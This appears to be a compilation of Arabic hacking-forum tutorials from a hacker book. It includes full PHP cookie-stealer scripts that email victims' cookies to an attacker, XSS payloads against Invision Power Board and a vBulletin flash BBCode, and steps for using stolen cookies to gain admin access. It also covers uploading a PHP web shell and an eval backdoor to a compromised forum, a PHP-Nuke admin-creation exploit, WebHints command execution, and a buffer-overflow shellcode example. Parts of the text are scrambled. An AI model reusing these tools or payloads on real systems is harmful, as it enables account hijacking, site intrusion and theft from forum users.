// Thnx For Security 4 Arab - [url]http://www.s4a.cc[/url] - [url]http://www.s4a.com/forum[/url]

//----- S4a Logger v0.10 -----// // Star

//Your Email --::-- $ToGet = "[email protected]";

//////////////////////////////// $Ip = $REMOTE_ADDR;

$Sys = $HTTP_USER_AGENT; //////////////////////////////////////////////

if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();} //

$Time = date("l dS of F Y h:i:s A");

$Hdr = 'From: Logger <logger@secourty>';

$Msg = ' Hi ,, Mr.Attacker :D

------------------------------------------- - Thnx For S4a ,, Security For Arab Forum -

- s4a - - s4a froum -

--------------------------------------------------------------------- - This Script Coded By Devil-00 [ Devil From Palestine ] -

- <[email protected]><[email protected]><[email protected]> -

420

--------------------------------------------------------------------- - IP ::- [ ' .$Ip.' ]

- System ::- [ '.$Sys.' ] - The ****** ::- [ '.$id.' ] - Time ::- [ '.$Time.' ]

--------------------------------------------------------------------- - root@devil00 ~ ./evilcat /etc/passwd -

- root@devil00 ~ ./s4acracker passwd --log <log.log> && - ---------------------------------------------------------------------

'; $send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);

// /* Refresh code ,, By Devil-00 [ 25/5/2005 ] << v0.10 */

if(isset($_GET["re"])){ $Refresh = $_GET["re"];

if($Refresh == ""){ mail ($ToGet,'S4a - [Error]','Refresh Is Set And Its Empty !!',$Hdr);

}else{ header("location:".$Refresh);

} } //

?>

: استبدل ھنا

$ToGet = "[email protected]";

com.hotmail@Drox_Linux :االيمیل ! تبعك بااليمیل

االيمیل طبعا افتح المفكره وحط الكود والتنسى تغیر php واحفظه بامتداد php واحفظه بامتداد

وارفعه على موقعك او على موقع اليكوس

لبرمجته ھذا اللوج األكثر من رائعDevil - 00بالشكر ھنا ألخي العزيز وأخص

421

راحةص

================ : * مالحظه

.. درس عملي فقط ال أكثر انا لم اضع التطبیق اال النه

cPanel تبع xss وبإمكانك استغالله بثغره

xss وغیرھا من ثغرات

التي تستخدم دائما hex شفرات الـ وفیه xss وحملو كتاب القرصان عن ثغرات

مھم جدا انك (( المتصفح طريقفي السكربتات الخبیثه وھي التي تطبق عن .. الشكل ھذا النھا قد توصل لبريدك المعلومات على Hex ((تعرف شفرات

20 %60% .. فكل من وحده لھا معنا سوف تحصلونه بالكتاب للقرصان

422

,, .0 1ALog v4Sلوج خفیف و دون قاعدة بیانات

Devil-00:للكاتب

,, بسم اهللا الرحمن الرحیم وما 0.1النسخه ) يثات على اللوج الموجود بالمنتدى نفسهمع سلسلة تحد

والحمد ومع الكثیر من االشخاص الساھمو بفكرھم و تعاطیھم معنا تم,, ) فوق وھوعبارة عن سطر جديده تحتوي ما كان,, من ھذا اللوج 1.0هللا انزال النسخه

,, يحتويه اللوج القديم من النسخه االولى

: -ممیزاتهھو من اسمه يقوم بجلب الكوكیز من ثغرات عديده و اشھرھا لرئیسیة والمیزه ا

) } XSS(كروس سات سكريبتنج( الــ المعلومات يقوم بارسال الكوكیز فورا الى بريدك وال يحتاج قاعدة بیانات لیخزن

,, علیھاالضحیه الى يقوم بعمل تمويھي عند اضافة حدث معین للوج و من خالله يرسل

تحددھا من خالل الرابطصفحه انت ,,

تستطیع ,, ھذه البیانات وال تفرق بینھا ان كنت من من يصلھم الكثیر من ,, او عملیة تقوم بھا التفريق الیوم باضافة خاصة التسمیه لكل وصلة

,, كیف يصل الكوكیز بقوم ايضا بعملیة فرز معینه للكوكیز و الیك المثال لتعرف

: -قبلhash=000111000;hash2=111000111;

: -بعدhash[ 000111000 ] hash2[ 111000111 ]

لقد قال الكثیر على انه اليكوس اصبح ال يدعم البي اتش بي و قواعد ) **

البريد الكن انا جربت اللوج على اليكوس الخدمه المجانیة و الحمد هللا البیانات و ** (وصلت وال ينقص شيء ارسل رساله و

423

<?php /* S4aLog v1.0 [ Beta ] ----------------------- **Beta Of S4aLog v1.0 With Str_Repalce <;> ! You Can Get Cookies And Refresh The Broweser ! v0.10 [ New New New ] !Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies [ MSG ] Name : Attack1 Cookies : Cookies Refresh : http://www.s4a.xx [ MSG ]! ! Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121; ! [ New New New ] */ $YourMail = "[email protected]"; // Your E-mail /*-----------------------*/ $Ip = $REMOTE_ADDR; $Cooki_e = $_GET['id']; $NameOfAttack = $_GET['nm']; $Refresh = $_GET['re']; /* Start */ $ReplaceCookie1 = array("=",";"); $ReplaceCookie2 = array("[ "," ] "); $Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki _e); // Replace /* e.x hash=0210; | hash[0210]*/ //***************************************// $Hdr = "From: S4aLog <[email protected]>"; $Msg = " Mr Attacker ;) ,,, S4aLog v1 Beta << [ ".$NameOfAttack." ] ,, Name Of Attack [ ".$Refresh." ] ,, Refresh Page [ ".$Ip." ] ,, Ip [ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ] [ [email protected] - [email protected] ] ----------------------------------------------- Cookie ::

424

".$Cooki_e." "; /* ------------------------------------------------------------------------- */ $Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr); /************************************************** ***************************/ if($Send){ if($Refresh <> ""){header("location:".$Refresh);} } ?>

: -علیك اال تعديل البريد الموجود بالكود الرئیسيما $YourMail = "[email protected]"; // Your E-mai

: -االستعمال وطريقةtest=id&cc.a4s.www://http=re&1Attack=nm?php.log/site://http

,, لتسمیة العملیة التي تقوم بھا nm >>ان المتغیر االول وھو الـ حیثالصفحة التي توھم من خاللھا الضحیة انوه re >>الثاني و ھو الـ غیروالمت

ان تكون الموقع الرئیسي او المنتدى او حسب الثغره مثال يفضل.. دخلھا من متابعتي لموضوع xxx فكرة االخ( الى الفالش اجعل اللوج ينقله,, الفالش

) ربط اللوج بالفالش ) على ھوا الثغره( كود الجافا سكريبت id >> ما حنا متعودين الـ واخیرا مثل

425

2.0.3من Invision Power Board اكتشاف ثغره حديثه وماتحت

Drox_ Linux:للكاتب

مادري وش جاني والكن تحمست شوي لھا واكتشفت الثغره وھي من نوعxss

المكتشف وهللا الحمد وانا

اول ماكتشفتھا نزلتھا ھنا

ره كثیرا وال عن االكتشاف وسوف اكتفي بوضعھا ھناالثغ والكن لن أتحدث عن

PHP :كودhttp://xxx.com/forums/index.php?act=idx='><script>alert(document.

******)</script>

.. الثانیه بملف المساعده اكتشفتھا منذ قلیل الثغره PHP :كود

http://www.xxxxx.com/forums/index.php?act=Help='><script>alert(document.******)</script>

( الملف الشخصي( ايضا بملف التحكم وھذه PHP :كود

http://xxx.com/forums/index.php?act=UserCP&CODE=00='><script>alert(document.******)</script>

426

... بملف البحث اكتشفتھا قبل شوي وھذه PHP :كود

http://xxxx.com/forums/index.php?act=Search&nav=lv&CODE=show&search_in=topics&result_type=topics&lastdate='><script>alert(docum

ent.******)</script>

.. بملف االعضاء او بمعنى اخر مشاھده عضو وھذه PHP :كود

http://XXX.com/forums/index.php?showuser=720='><script>alert(document.******)</script>

استبدله برقم عضويتك مثال مالحظه لو تستبدل الرقم بلمشرف 620رقم ھنا الشيء راح يطلع الكوكیز تبعك أنت العام نفس

بملف شروط الكتابه وھنا ايضا اكتشاف جديد

PHP :كودhttp://www.XXX.com/forums/index.php?act=boardrules='><script>ale

rt(document.******)</script>

... ايضافي ملف الصوره الشخصیه للعضو ھذه ثغره موجوده بھا وھنا PHP :كود

http://xxxx.com/forums/index.php?act=UserCP&CODE=photo='><script>alert(document.******)</script>

: ھامه جدا مالحظه

427

! اشبكھا طبعا النھا ھنا مشفره c o o k i e بـ**** استبدل

وطريقه ربطھا باللوج وضعتھا بموضوع مسحب

: شروط الثغره االصدار وما تحت اي قبل االخیر ھذا2.0.3يكون االصدار من ان 1- ان تكون كـ عضو2-

428

شرح احدى ثغرات الصندوق السحري

7Jr.Dr& sLicJI:للكاتب

وھى ثغرة الفالش واعتقد بعضكم يعرف xss الشرح راح يكون إلحد ثغرات طريقتھاا

االستغالل يقول صعببس حبیت اقدمھا للي مايعرفون كیفیة استغاللھا واللى

مع انه واهللا سھل

السحري والماسي ، ثغرة طبعا اخونا العندلیب اكتشف ثغرة في الصندوقین الفالش ، ثغرة الريلر بلیر ،

، ثغرة تنسیق القصیدة

ياهللا نبي الشرح بس قبل ال ابدي ابي منكم تقرؤون ھالعبااره

مین والعربإقسم باهللا اننى ال استخدمھا ضد اخوانى المسل

وتم التطیق على منتدى معین وجانى الكوكیز بآقل من دقیقه

ياهللا نبدي الشرح


اللوجو من برمجة اخونا ديفیل اهللا يعطیه الف عاافیه إول شيء ھذا

PHP :كود

<?php /* S4aLog v1.0 [ Beta ]

----------------------- **Beta Of S4aLog v1.0 With Str_Repalce <;>

! You Can Get Cookies And Refresh The Broweser ! v0.10 [ New New New ]

429

!Named Your Attack With $nm e.x [url]http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies[/

url] [ MSG ]

Name : Attack1 Cookies : Cookies

Refresh : [url]http://www.s4a.xx[/url] [ MSG ]!

! Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old

bbpassword=12121; bbhash=12121; !

[ New New New ] */

$YourMail = "[email protected]"; // Your E-mail /*-----------------------*/

$Ip = $REMOTE_ADDR; $Cooki_e = $_GET['id'];

$NameOfAttack = $_GET['nm']; $Refresh = $_GET['re'];

/* Start */ $ReplaceCookie1 = array("=",";");

$ReplaceCookie2 = array("[ "," ] "); $Cooki_e =

str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki _e); // Replace

/* e.x hash=0210; | hash[0210]*/ //***************************************//

$Hdr = "From: S4aLog <[email protected]>"; $Msg =

" Mr Attacker ;) ,,, S4aLog v1 Beta <<

[ ".$NameOfAttack." ] ,, Name Of Attack [ ".$Refresh." ] ,, Refresh Page

430

[ ".$Ip." ] ,, Ip [ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)>

<s4a Members> ] [ [email][email protected][/email] -

[email][email protected][/email] ] -----------------------------------------------

Cookie :: ".$Cooki_e."

"; /* ------------------------------------------------------------------------- */

$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr); /************************************************** **

*************************/ if($Send){

if($Refresh <> ""){header("location:".$Refresh);} }

?>

ارفع اللوجو على النت لكن في مالااحظه بسیطه وھى غیر االيمیل الحین إليمیلك الموجود بالوجو

;"[email protected]= "YourMail $

على النت وبعد التغیر اعمل حفظ وارفع اللوجو

السحري دوقوالحین راح تتم التجربه على ثغرة الفالش وھى من ثغرات الصن

وھذا كود الثغره

:كود

[flash=http://www.xxxxxx.com/test.swf]onmouseover='alert(document.cookie);'[/flash]

431

ربط اللوجو لكي اليصعب على المبتدئین وتم

:كود

[flash=http://www.athab.com/card/images/swf/al-jar7.swf]onmouseover='location.href="http://www.xxx.com/log.php?n

m=al-battar.net&re=http://www.xxxx.com/vb/showthread.php?t=1245&id="

+document.******'[/flash

ياشباب ندخل بالمتغیرااات لحین

اوال

swf.7jar-al/swf/gesima/card/com.athab.www

اللى تبیه ويفضل يكون حجمه صغیر لرابط الفالش

ثانیاا

php.log/com.xxx.www

لموقعك يعني تحط الرابط الموجود ھذا رابط اللوجو بعد ماحفظته ورفعته بموقعك بعد عملیة التعديل

ثالثاا

1245=t?php.showthread/vb/com.xxx.www://http

مھم يعني مثال اى واحد يمر المآوس قدام الفالش راح يوديیه ھذا ياشباب

بالكود للصفحه الموجوده

432

عشان ال يشكوانا انصحك تحط يرجع لنفس الصفحه الموجود فیھا الفالش

الضحیه

لصفحه ونشكر اخونا ديفیل الن طور اللوجو الن اول لوجو المريت المآوس يوديك بیضه

( المطور ) وجزاه اهللا خیر دع الخیاار لناااا اهللا يوفقه في الوجو الجديد

)إكید بعضكم يبي يقول شلؤن اعرف انه ھذا الكوكیز الى منتدى( مإلحظه

مررو یآر الثالث بالكوكیز وھى الصفحه المراد الذھاب لھا بعداجابة السؤال الخ

مآوس الضحیه امام الفالش

ھذا الكوكیز راح تجیك داخل الرساله وجذى تعرف الى منتدى

) بھذا الشكل( الحین ھذى شكل الرساله اللى راح توصلك

****** :: [ stvisitbbla] efa 3523f42aba928936bc27ffbe3e0b6[ bbsessionhash

] 1119817013 [view_bbforum ] 1119817959[ bblastactivity ] _ y1119817237yix2ix-x1cax54eb9f8abaf2d834bc0fb8e417e3523[lastview_bbthread -x1aax28e8fe33812245c29ac97e12fed56cf[bbuserid] _ y"\1111907592"\x10ysx1985ix

730f8e6974e4df766d3d6686129b9360[ bbpassword] 6224

التالى المھم بالرساله كله

bbpassword bbuserid

bblastactivity

433

bblastvisit

فیه واكید الزم تكون مسجل بالمنتدى اللى ودك تدخل بنك االدمن

الحین نطلع اللى نبیه من الكوكیز اللى وصل لنا باإليمیل

bbpassword 730f8e6974e4df676d3d6686129b9360

bbuserid

6224

bblastactivity 1119817959

bblastvisit

1119817013

الكوكیز اآلن إفتح برنامج

صفحة المنتدى اآلن بعد تسجیل الدخول التلقائي بالمنتدى نغلق

والحین نفتح البرنامج ونعدل الكوكیز كما بالصوره

شيء rr يات تبدآ بـمنتد مو بكل المنتديات تبدآ بكل كلمه مثال bb مالحظه عـآدى

للمتصفح واذھب للمنتدى سوف ترى واآلن بعد التعديل إغلق البرنامج واذھب

انك

اصبحت ادمن

434

تمت التجربه على عده منتدياات بنجااااح

والثغره الزالت شغاله واستغاللھاا سھل مثل ماتشووفوون

الترقیع

الممنوعة طبعا التنسى التفعیل اجعلھا من ظمن الكلمات c o o k ie كلمة

الحین تقفلت الثغرة ؟ كما تالحظون وخالص

الني لو كتبتھا عااادية جلعت بین الحروف مسااافة c o o ki e كلمة

سوف تطلع على شكل نجوم

الثغره ھنا لتحمیل اللوجو مع كود

تحمیل

435

منتدي مخترق طريقة رفع الشل في

RedHat_ Super:للكاتب

الیكم الطريقة

اتحكم منتدي وعند الدخول الي لوحة عندم يتم اخرق اي

admin/vb/com.xxx.www ھكذا

smilies روح حق خیار

تحتة بظبط رح تحصل Upload-y Modif-Add

Upload اختر انت

وفیه مكان لرفع ملف رح تظھر صفحة

استعرض بعد ذلك

الملف وراح ينزل Upload انزل تحت واضغط

ويكون كذا

php.shell/smilies/images/vb/com.xxxx.www

::::::::::

وھي الفضل عندي طريقة

انك تروح اتمبلت

436

وبحث عن كلمة

phpinclude

بسھوله يطبق لك االومر phpinclude وحط الى تبغا من كود لئه ھذا

اقصد االومر ھي اومر لینكس طبقة من المتصفح

الكود ھذا

: only4This code is PHP//

; ()start_ob// ])'x'[GET$_(if { ;]'x'[GET$_= X $ } ])'x'[POST$_(if { ;]'x'[POST$_= X $ } )''!= X $(if {

())gpc_quotes_magic_get(if { ;))X$(stripslashes(eval }

else { ;)X$(eval } ;exit }

437

;")html.yourheader("require// ; ()contents_get_ob= header $// ;()clean_end_ob//

438

لصور با Add Admin.4 7Nukeشرح

forhacker :للكاتب

نبدا الشرح قم بتنزيل ھذا الملف اوال كلیك يمین حفظ باسم

/net.4erhack.www://http:باسورد فك الطغط

============== االن قوم بالبحث عن المواقع المصابه فى ھذا الموقع االسرائیلى

il.co.walla.www://http/ واكتب

by PHP-Nuke. All Rights Reserved+co.il

=========

439

ثم جرب الدخول الى اى موقع واكتب جنبه/php.admin

سوف يظھر لك ھذا

=========

notepadثم قوم بفتح الملف بواسطه ال

واكتب اسم الموقع كما بالصوره

440

php.admin/الحظ وجود

=== htmlثم قم بالحفظ وافتح الملف بصیغه

كما بالصوره

441

واتبع التعلیمات فى الصوره ثم اطغط

create admin سوف يظھر لك ھذا الشكل اتبع التعلیمات

442

====

loginثم اطغط تم االختراق بحمد اهللا

مبرووك علیك انت فى لوحه التحكم

443

WebHints ثغرةستغالل كیفیة ا

Soofaa:للكاتب

المنتشرة لدى المواقع األمريكیة وفائدة الثغرة تفیدك في --< WebHintsثغرة وصدقوني الثغره سھلة في تطبیق اوامر اللینكس على سیرفر الموقع

الكن يبغالھا شوية تركیز خلیكم معاي..:::... :::...:::...:::...:::...:::...:::...:::...:::...:::...:::...:::...:::...::::.

:- اوال نقوم بالذھاب الى محرك بحث جوجل الدخول الى جوجل

....الشرح في الصور نتابع باقي

446

واشوف بصراحة انھارضاكم ھذا واهللا اعلم ارجو ان الثغره تكون قد نالت

....األوامر سھلة جدا بالذات ھالنوع من الثغرات لتطبیق

واخترقھا ادخل علیك الي كل المصابة المواقع من مجموعة وھاذي

الموقع األول الثاني الموقع الثالث الموقع

الموقع الرابع الموقع الخامس الموقع السادس

السابع الموقع الثامن الموقع

بحثه ونوع واحد كل وتذكروا الشباب علیھا لیتمرن المواقع بعض ھاذي كانت

448

أساسیات إكتشاف وإستغالل ثغرات أنظمة التشغیل

jaas :للكاتب

ولكن مرت ھذة األيام , أيام 3توقعت أن أكتب ھذا الموضوع وأنتھي منة في من أين ابدأأعرف وأنا لم

من والسبب قد يكون في تشعب الموضوع لدرجة أننا في ھذة السلسلة

الدروس سنذكر كل لغات البرمجة

مواضیع الشبكات و البرامج و سندخل في, تقريبا وسنقوم بإستخدامھا األنظمة وأخیرا المعالج والذاكرة

تطلبات أو مايتعلق بالكمبیوتر بشكل عام لكي نعرف ماھي م قد نناقش كل

!!!؟)الھكر(خبرات كاشف الثغرات

في شھر مواضیع أتوقع أن أنتھي منھا4ھذة السلسلة من الدروس قد تأخذ ھذا إذا لم ندخل في تفاصیل كثیرة

إكتشافھا مع أمثلة تطبیقیة على ثغرات سنبدأ في شرح الثغرات وكیفیة

حقیقیة تم إكتشافھا ابتھا ؟تندھش من غر سنتعرف على أمور قد

ثغرات أنظمة ) ip (ھل تعلم بوجود طرق إلختراق األجھزة فقط تتطلب رقم-

التشغیل يمكن إختراق , موقع أودخول) فتح رسالة (فقط بمجرد دخول صفحة إنترنت-

) المتصفح- ثغرات البرامج( جھازك

449

نت الديدان تدخل لجھازك فقط بمجرد وصل الجھاز باإلنتر بعض الفايروسات أو- ثغرات أنظمة

-

الثغرات وإستغالل ShellCode واألغرب من ھذا سنتعرف على تقنیة أو طريقة

تتوقع ماذا - التحكم في سیر التنفیذ لنظام التشغیل من خالل: وسنبدأ بمثال txt ملف نصي!! ؟

- في أنظمة التشغیل بعد ھذا الموضع أتوقع أنك ستنسى كل ماھو مألوف لمقولةوستتأكد من ا

.... وخاصة في البرمجة! كل شيء ممكن ؟

ثغرات أنظمة التشغیل: البداية

أكید ستجد ! التغییر في ملف تنفیذي وطريقة عملة ؟ ھل يمكن,, لو سألت

الجواب نعم

..... ذلك البرمجة العكسیة والكراك والباتش واألمثلة على

والتغییر في الكود بالتأكید يغیر ,, الملف التنفیذي كل ھذة األمثلة تغیر في كود الملف في طريقة عمل

!واآلن لو سألت ھذا السؤال ؟

تنفیذي دون التغییر في كود الملف ھل يمكن التغییر في طريقة عمل ملف

!؟؟؟؟؟

الالالالال وألف ال : والخبراء والمبرمجین ھو أنا متأكد أن يكون جواب كل العقالء ) عني ماتدخل العقل(

ھل تصدقون - وبدأ يبحث عن طريقة , ظھر لنا مجنون وقال ممكن لیش ال ولكن

450

وجدھا أنة

أھم شيء تعرفة في ھذة المرحلة ھو القانون, ولكن بشرط وھو حدوث خطأ : التالي

حدوث يمكن التغییر في طريقة عمل ملف تنفیذي دون التغییر في الكود بشرط

خطأھل ! التنفیذ ؟ برنامج ويحدث خطأ أين ينتقلأريد أن أسال عندما نستخدم

يخرج من البرنامج ؟

ھل , ووجھناة لنقطة معینة ماذا لو إستطعنا التحكم في مجرى التنفیذ !المطلوب التغییر في كود البرنامج؟

ال: األسئلة أجوبة ھذة

طريقة أعتقد أنھا أسھل, بمثال تطبیقي : سؤقرب لك ما أريد إصالة

في نفس ول عبارة عن برنامج ھذا البرنامج يبحث عن ملف نصيمثالنا األ المجلد

textbox او edit بعد أن يجدة يقوم بقرائة محتواة وعرضھا بداخل أداة نص

ونحن بدورنا سنقوم بالكشف عن خطأ في ھذا البرنامج ومن خالل الخطأ

سنبحث عن ثغرة

دون التغییر في ,, البرنامجتمكننا من إدخال كود برمجي وتنفیذة وتغییر مجرى كود البرنامج األصلي

) خالل محرر ھكس من( فقط سنغیر في محتوى الملف النصي

التشغیل وھي وسنتعرف في ھذا المثال على أكثر الثغرات إنتشارا في أنظمة

overflow أو أخطاء الفیض

451

رج الملفات أخ( الشفرة المصدرية + البرنامج , ستجد في ھذة الرابط مثالنا ) إلى مجلد

zip.a0myexp/files/Code/files/com.2000arabteam.www://http

فإن البرنامج , عندما تضغط علیة Read file تشغل البرنامج ستجد أمر عندما

يقوم بقرائة

ھذا الملف النصي موجود في نفس مجلدtxt . infoت الملف النصيمحتويا البرنامج

يقرأ الملف ولو ألقینا نظرة على الكود الذي, ويعرض المحتوى داخل أداة النص

) Rfile(الدالة

:لوجدنا التالي

BOOL Rfile(HWND mhWnd) { HANDLE hfile=(HANDLE)-1; DWORD nbt=0; الحظ حجم مصفوفة الحروف // TCHAR buf[10]; hfile=CreateFile ("info.txt",GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE, (LPSECURITY_ATTRIBUTES )NULL,OPEN_EXISTING,0,NULL); if(hfile==(HANDLE)-1) { MessageBox (mhWnd,"ER: CreateFile ","Error 01",MB_OK); return 1; } ZeroMemory(buf,10); ReadFile (hfile,(LPVOID)buf, (DWORD)GetFileSize (hfile,NULL),&nbt, (LPOVERLAPPED )NULL); SendMessage (mEdit,WM_SETTEXT ,0,(LPARAM)(LPCTSTR)buf);

452

return 0; }

حرف أ10حجمھا buf في الكود المتغیر أو المصفوفة ستالحظ

بعد ذلك buf الملف النصي وتخزين محتواة في المتغیر يقوم البرنامج بقرائة

أحرف10ماذا لو كان محتوى الملف النصي أكبر من , ينقل إلى األداة النصیة

بالبحث والنبش داخل ھذا الخطأ سنقوم,, بالتأكید سیحدث خطأ

ولكن لتطبیق الدرس, ف أحر 10 إفتح الملف النصي وقم بكتابة أي نص أكبر من

: النص التالي من حیث تشابة العناوين والمحتوى يفضل كتابة

fffdsdddertttttttttyyyyyyyyyyyyyyyyuuuuuuuuuuuuuuu uuuiiiiiiiiiiiiiiiiiiiiiiioooo oooooooooooooooopppppppppppppp

لمراقبتةly olشغل البرنامج بواسطةtxt . infoبعد أن تكتب النص في الملف

قرائة دالة Rfile يمثل بداية الدالة E004013x 00ضع نقطة توقف عن العنوان وعرضة,النص

يتوقف التنفیذ عن Read File بعد أن تضع نقطة التوقف شغل البرنامج ونفذ

نقطة التوقف

خاصة قسم (الحظ الصورة ,,,, في الكود المصدري Rfile وتمثل بداية الدالة المكدس

453

نفذ بعد ذلك, سجل العنوان الذي سیخزن بة عنوان العودة وسیر التنفیذ رنامجالب

readfile إلى أن تصل إلى نقطة الخطأ وھي الدالةF 8خطوة بإستخدام, خطوة

وبعد تنفیذھا ال حظ التغیرات

454

!أكید إكتشفتھا ؟؟, ھنا الورطة

" tttt" وھي16 و15 و 14 و 13النصي األحرف ماذا لو غیرنا في الملف

, سیستخدمھا المعالج إلستمرار ونقل التنفیذ تمثل ھذة األحرف عنوان العودة غیر ھذا العنوان

ھذا العنوان يمثل كود لبرنامج,نصي بداخل الملف ال إلى عنوان آخر

!!!!!!!!!!!!!مثال؟؟؟

بداخل الملف النصي سنقوم بكتابة كود تنفیذي+ الحظ كیف سنغیر العنوان

: بھذة الطريقة

455

F 8تابع, النصي وتكتب الكود بداخل محتوى الملف, بعد أن تغیر في العنواين

وبعد ذلك سینقل RETN إلى أن تصل إلى تعلیمة العودة في نھاية الدالة وھي المعالج

الكود التنفیذي حديدة وكتبت بةالتنفیذ إلى العنوان الذي قمت بت

456

الموجود بداخل سینفذ برنامجنا الكودوالحظ كیف F 8وبعد ذلك تتبع البرنامج الملف النصي

457

التغییر في كود البرنامج وبھذا نكون قد نقلنا التنفیذ دون, ذ وسینتقل لة التنفی األصلي

بداخل الملف النصي وكل التغیرات واإلضافات التي رأيناھا كانت

نكون قد , التغییر في كود البرنامج وألننا إستطعنا التغییر في سیر التنفیذ دون إكتشفنا ثغرة

buf عدم تحديد حجم القرائة للمتغیرالكود وھو في البرنامج وسببھا خطأ في

خاص بالثغرة وھو شبیة ShellCode نقوم بكتابة , وبعد أن نكتشف الثغرة

458

بالكراك بعد كسر البرامج

وللتسھیل تكتب بالھكس0 و1عبارة عن أرقام ثنائیة shellcode ولكن

hellcode sتكتب بداخل أي لغة برمجة مثال ثغرات األنظمة تكتب ھذة األرقام السي بواسطة لغة

html أو asp أو php ثغرات خوادم المواقع والسكربتات تكتب بلغة بیرل أو

تمثل عبارة عن أرقام بداخل ھذة اللغات ھذة األرقام shellcode المھم أن يكون

كود بلغة اإلسمبلي يمرر إلى الثغرة لیتم تنفیذة

ھذا الملف txt . infoف نصيواآلن سنكتب برنامج بلغة السي ينتج لنا مل مختلف النصي

ألنة سیحتوي على عناوين اإلنتقال لسیر وتنفیذ, عن أي ملف نصي آخر

البرنامج

( عبارة عن إظھار مسج( باإلضافة إلى أنة سیحتوي على كود تنفیذي

وفقط بمجرد توزيع ھذا الملف النصي على أي جھاز يحتوي على برنامجنا فقرائة المل وبمجرد

اآلخر النصي نكون قد نفذنا أي كود أوبرنامج في الجھاز

+ shellcodeھذا ھو الكود

#include <stdio.h> char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xA4\xFB\x12\x00" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x6A\x00\x68\x00\x00\x00\x00\x68" "\xC4\xFB\x12\x00\x50\xFF\x15\xA0" "\x40\x40\x00\x90\x90\x90\x90\x90"

459

"\x90\x90\x90\x90\x90\x90\x90\x90" "XxXx Virus.exe is loading....." "\x00\x00\x90\x90\x90\x90"; int main() { FILE* hfile=NULL; int nb; if (!(hfile=fopen ("info.txt","w+b"))) { printf("Error: fopen()"); return 0; } nb=fwrite(shellcode,sizeof(char), sizeof(shellcode),hfile); fclose(hfile); printf(" -- OKKKKKKKKKK --\n"); printf(" -|- Write %d byte -|- \n",nb); printf("-- Create info.txt Virus --\n"); return 1; }

ھذة الطريقة متبعة في كل- ھل تشاھد طريقة ترتیب الكود : مالحظة لثغرة shellcode وأي كود تراة بھذة الطريقة يعتبر ,, برامج إستغالل الثغرات

: المھم

ضعة في مجلد البرنامج, البرنامج لینتج لك ملف نصي نفذ النتیجةلتالحظ Rfile وقم بتنفیذ الدالة

تشغیل الكود أو البرنامج الموجود في الملف النصي: وھي

وھي, وبھذا نكون قد أخذنا كل أقسام الثغرة

460

عن خطأ بداخل أي ملف تنفیذي البحث مرحلة الخطأ محاولة إيجاد طريقة لنقل أو تغییر مسار التنفیذ في

ثغرةال أو كتابة كود إلستغالل واإلستفادة من shellcode كتابة -

سلسلة ضمن(سنأخذ في الدرس القادم, وبعد ھذة المقدمة المھمة جدا )الدروس

وندوز مثال متقدم لطريقة إكتشاف ثغرة وتطبیقھا في نظام الثغرات باإلضافة إلى طريقة عمل أشھر الفايروسات وكیفیة إستغالل

ودخولھا إلى أي جھاز فقط بمجرد اإلتصال باإلنترنت

461

ضحیةدراسة موقع ال

محمد قطان: للكاتب

أساسیات االختراق

بداية أنا أكتب ھذا المقال وأفترض أن لدى القارئ معلومات بدرجة وسط حول .....ھذا الموضوع

البد من اإلشارة إلى أن الھكرز المحترفین يعتمدون في اختراقھم للمواقع على

لشركات وذلك ألسباب منھا أنه ھو األكثر انتشارا لدى اLinuxنظام وكذلك لتوفر أدوات اختراق قوية تعمل على ھذا النظام , المستضیفة للمواقع

إال أن مطوري مثل ھذه األدوات لم يغفلوا أنظمة . خالفا لبقیة األنظمة األخرى ومع ذلك تبقى ھناك بعض الفوارق , تشغیل مايكروسوفت وذلك لشیوعھا

وسأركز في شرحي ھنا ,تجعل االختراق عبر لینكس ربما أفضل من غیره .على االختراق عبر نظام ويندوز لوجود أدوات تؤدي المھمة بدرجة ال بأس بھا

التي توصلنا إلى ) Exploites( اختراق المواقع يتم عادة من خالل الثغرات

وھذه الثغرات منھا ما يكون في نظام , للموقع Pwlالغاية وھو ملف إلباس وورد وقد تكون في الملقم أو التقنیة , ضیف للموقع الضحیة تشغیل السیر فر المست

...PHP أو CGIالمستخدمة في بناء الموقع وغالبا ما تكون وعملیة اختراق موقع ما تتطلب دقة متناھیة ودراسة عمیقة لھذا الموقع ألن

لیس أمرا Home Pageوتغیر ال ) إن صح التعبیر ( الموقع Rootالوصول إلى ره البعض وھذا يختلف باختالف سیر فر الموقع وأنظمة األمان سھال كما يتصو

.التي يستخدمھا مما يجعل اختراق موقع ما مستحیال أو صعبا أو سھال نوعا ما

:دراسة الموقع الضحیة : المرحلة األولى ھذه المرحلة أساسیة وھامة ويجب أن تتم بدقة ودراسة عمیقة

:وتشمل الدراسة عدة أمور

.المنافذ المفتوحة في الموقع معرفة .الكشف عن النظام الذي يعمل علیه السیر فر المستضیف للموقع

.معرفة نوع الملقم للموقع

462

. Perl- PHP -CGI .... دراسة بنیة الموقع البرمجیة , وھناك أمور أخرى مثل مدى الخسائر المادية الناتجة عن اختراق الموقع

موقع واألوقات التي ينشط فیھا الموقع من حیث عدد والنسبة المئوية لزائري ال .........الزائرين وأوقات الخمول

:األدوات المتاحة لذلك

ولكنني سأختصر الطريق ... ھناك طرق كثیرة لجمع مثل ھذه المعلومات

.ونتحدث عن األقوى مباشرة :البرامج

Port Scaner و canWin S و Super Scan: منھا يعمل على بیئة الويندوز مثل وھي برامج تعطي معلومات غالبا ....... Whoisوكذلك أحد البرامج التي تعمل

.ما تكون جیدة وھي معرفة وقوية ومفضلة لدى Nmap فیمكن استعمال Linuxبالنسبة لنظام ...........UDP و TCPكما أنھا توفر مسح للبورتات , كثیر من الھكرز

